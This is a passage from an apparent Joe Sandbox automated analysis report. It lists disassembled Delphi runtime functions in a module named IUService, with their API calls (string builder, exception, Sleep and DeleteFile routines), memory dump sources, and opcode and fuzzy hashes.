                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DataVariants@@$Clear$qqrr8Copy$qqrr8Datarx8InitInt64$qqrrx8Variant
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 982248214-0
                                                                                                                                            • Opcode ID: 37f6956e85cea9c2e1152c5003857ce2c9587256c9285128c420a0876b4c209a
                                                                                                                                            • Instruction ID: f4c72c2286b61437debaaf5d87f3c56d8b0a9ac11da70185b95361aa417c55d7
                                                                                                                                            • Opcode Fuzzy Hash: 37f6956e85cea9c2e1152c5003857ce2c9587256c9285128c420a0876b4c209a
                                                                                                                                            • Instruction Fuzzy Hash: 9BF05E319046899FCB06DFE4EC528EEBBFCEB48200F514673E600D2251EA309945CA94
                                                                                                                                            Function 5002C220 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C22A
                                                                                                                                            • @System@TObject@$bctr$qqrv.RTL120(?,?,?,5002C1FA), ref: 5002C239
                                                                                                                                            • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,?,5002C1FA), ref: 5002C249
                                                                                                                                            • @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,5002C1FA), ref: 5002C259
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$AfterBuilder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvStringSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1727176548-0
                                                                                                                                            • Opcode ID: 68ad4378320049a673c0ba78b27b0f3727ba377b8d7406c843f74b7b50d33d9b
                                                                                                                                            • Instruction ID: f4a9a15b8d1a87e593a23b1651af1a404b07da154b15add0f3e5161749c54f5b
                                                                                                                                            • Opcode Fuzzy Hash: 68ad4378320049a673c0ba78b27b0f3727ba377b8d7406c843f74b7b50d33d9b
                                                                                                                                            • Instruction Fuzzy Hash: E9E022B3B02481878300C6AE7C41A6676C78FC5570B188332B028CB385EB268C1603E2
                                                                                                                                            Function 5002C360 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@TStringBuilder@get_Capacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C366
                                                                                                                                              • Part of subcall function 5002C39C: @System@@DynArrayLength$qqrv.RTL120(5002CEC3), ref: 5002C39F
                                                                                                                                            • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C37C
                                                                                                                                            • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C387
                                                                                                                                            • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,5002CECE), ref: 5002C392
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSysutils@$Builder@get_Capacity$qqrv$ArrayBuilder@set_Capacity$qqriLength$qqrvSystem@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1916226493-0
                                                                                                                                            • Opcode ID: d0824a8af33cadbe3178f22280927c209b2c4cdd0f5c74774a72a4c6b9b60ecc
                                                                                                                                            • Instruction ID: 23260aa18dfd21666b53627013c0cc0a4d10d4ba6927f08ef2018b0f3389f9ba
                                                                                                                                            • Opcode Fuzzy Hash: d0824a8af33cadbe3178f22280927c209b2c4cdd0f5c74774a72a4c6b9b60ecc
                                                                                                                                            • Instruction Fuzzy Hash: 2EE0E223B135B2078720E9BCBCC188D41C84A280B030AAF77F805EB303E5A9CE8543C0
                                                                                                                                            Function 5003070C Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030756,?,00000000), ref: 50030727
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030756,?,00000000), ref: 50030736
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030756,?,00000000), ref: 5003073B
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                                                            • Instruction ID: 7b96b98e3e44b9784b1c23c869ab84a684675366666c903ca15437983a838fae
                                                                                                                                            • Opcode Fuzzy Hash: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                                                            • Instruction Fuzzy Hash: 12E09234505588EFEB22DB90FD629AAB3A9EB59700FE10573F90083651DA317E00D9A0
                                                                                                                                            Function 500307FC Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030846,?,00000000), ref: 50030817
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030846,?,00000000), ref: 50030826
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030846,?,00000000), ref: 5003082B
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                                                            • Instruction ID: 0fd73ecdc63e3906adab3347c8ca8083b58c1d45574116356cda35ff769876bc
                                                                                                                                            • Opcode Fuzzy Hash: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                                                            • Instruction Fuzzy Hash: D5E09234105688EFEB11DFA1EE6296AB3A9EB94740FA10573F90482651DE316E00D990
                                                                                                                                            Function 50030850 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5003089A,?,00000000), ref: 5003086B
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5003089A,?,00000000), ref: 5003087A
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,5003089A,?,00000000), ref: 5003087F
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                                                            • Instruction ID: 375d69ef3d01049e605aa9f8fdfeda863f1c380b39b0ffaf094c9cd922885603
                                                                                                                                            • Opcode Fuzzy Hash: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                                                            • Instruction Fuzzy Hash: A7E09B34105684DFFB12DB94ED7399A73A8EB54700F9105B3F90142651DE356E00D990
                                                                                                                                            Function 50030A34 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030A7E,?,00000000), ref: 50030A4F
                                                                                                                                              • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                                                              • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                                                              • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030A7E,?,00000000), ref: 50030A5E
                                                                                                                                              • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                                                              • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                                                              • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50030A7E,?,00000000), ref: 50030A63
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336146123-0
                                                                                                                                            • Opcode ID: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                                                            • Instruction ID: 7528d12fff5074f310ed779a2ab25226a40bb15e629f8c4203f1ec9f173bc9b7
                                                                                                                                            • Opcode Fuzzy Hash: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                                                            • Instruction Fuzzy Hash: BDE0D834105A88EFEB12DBE0FD729AAB7B9EB59700F914577F90083651DF316E00D991
                                                                                                                                            Function 5000212C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 22sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000000,50003885), ref: 50002142
                                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,50003885), ref: 5000215B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: LJP$LJP
                                                                                                                                            • API String ID: 3472027048-3339104776
                                                                                                                                            • Opcode ID: c164c85c6bd618db57c2144687f5cfb642152b2fc34a6d7309f96ec3fd8f8499
                                                                                                                                            • Instruction ID: 1f4c43393d7b9fdfd9f5fbbc5e004a109d874a1f633b2967da1b9418d077b2a2
                                                                                                                                            • Opcode Fuzzy Hash: c164c85c6bd618db57c2144687f5cfb642152b2fc34a6d7309f96ec3fd8f8499
                                                                                                                                            • Instruction Fuzzy Hash: 56E0CD286083C112FB8056F028397DF17C30BB1584FC4038AEF54471D3C67A68055346
                                                                                                                                            Function 50005124 Relevance: 6.0, APIs: 4, Instructions: 20fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120 ref: 5000513C
                                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 50005147
                                                                                                                                            • GetLastError.KERNEL32(?), ref: 50005150
                                                                                                                                            • @System@SetInOutRes$qqri.RTL120(?), ref: 50005155
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Res$qqriSystem@$DeleteErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2381681663-0
                                                                                                                                            • Opcode ID: f50552c7c8a8d1e0cbec7b417928886d24a38268f93fe67ec141b2c984adff18
                                                                                                                                            • Instruction ID: bb7ad3ba53af60b48c6de9ba25e781b0205e3d77af95161216580be110d8d8b4
                                                                                                                                            • Opcode Fuzzy Hash: f50552c7c8a8d1e0cbec7b417928886d24a38268f93fe67ec141b2c984adff18
                                                                                                                                            • Instruction Fuzzy Hash: 1CD05EE964308082FF443AE8E4B17C661998F54213FC842A3BD4489187F72DCAD195B5
                                                                                                                                            Function 50003A58 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003A6A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$qqrpvibFillSystem@@
                                                                                                                                            • String ID: <JP$jP
                                                                                                                                            • API String ID: 4121559260-1976356052
                                                                                                                                            • Opcode ID: 1df4666b6065bb4c860eebf29b90c5e0bf618a6166f25d08af580d2d2a1666dc
                                                                                                                                            • Instruction ID: 29e72c1258d551b32b7b75072670d586078dfe44cbfcda950a95c9ee85119c78
                                                                                                                                            • Opcode Fuzzy Hash: 1df4666b6065bb4c860eebf29b90c5e0bf618a6166f25d08af580d2d2a1666dc
                                                                                                                                            • Instruction Fuzzy Hash: 46416D71604B41CFE361DFADD89470AB7E0EF94228F44CB2EE589CB652E734E8448B46
                                                                                                                                            Function 50003838 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
